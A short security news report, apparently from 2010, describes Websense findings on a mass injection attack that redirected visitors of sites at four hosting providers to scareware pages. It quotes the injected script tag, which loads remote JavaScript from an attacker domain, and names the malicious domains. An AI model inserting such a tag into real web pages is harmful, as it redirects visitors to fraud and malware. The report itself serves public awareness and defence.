New Mass Injection Attack Forcing Websites to Spread Scareware

According to the information released by Websense (a web and e-mail security solutions' providing firm), a mass injection attack targeting web hosting networks has become a serious concern. Users visiting these hacked websites will be redirected to rouge anti-virus (AV) websites.

The security firm states that the targets are four famous web hosting providers - Bizland, BlueHost, Go Daddy and DreamHost.

Websense further states that during the first week of September 2010, the number of affected websites ranged from 22,000 to about 39,000 depending on the day. According to the data collected by Websense, BlueHost was the most affected hosting company and accounted for 38% of compromised websites. It was followed by DreamHost with 28%. BizLand and Go Daddy acquired the third and fourth spot with 19% and 12% respectively.

Explaining the attack technique, security researchers stated that the cyber-crooks utilized same injections to insert a PHP tag link in a script tag at the bottom of every hacked webpage as shown:<script src="http://www.kdjkfjskdfjlskdjf.com/js.php"></script></body>.

This external code verifies whether the user was attacked before or not. In case the user was not attacked, it redirects him to websites in the .co.cc domain space, which display numerous bogus antivirus alerts usually linked with scareware campaigns.

As per the security experts at Websense, the motive of these fake alerts is to persuade users to install rouge antivirus program, which further floods their systems with fake warnings to deceive them into paying license fees.

The two malicious domains (i.e. losotrana.com and whereisdudescars.com) linked with this attack were also involved in the same mass compromise in July 2010.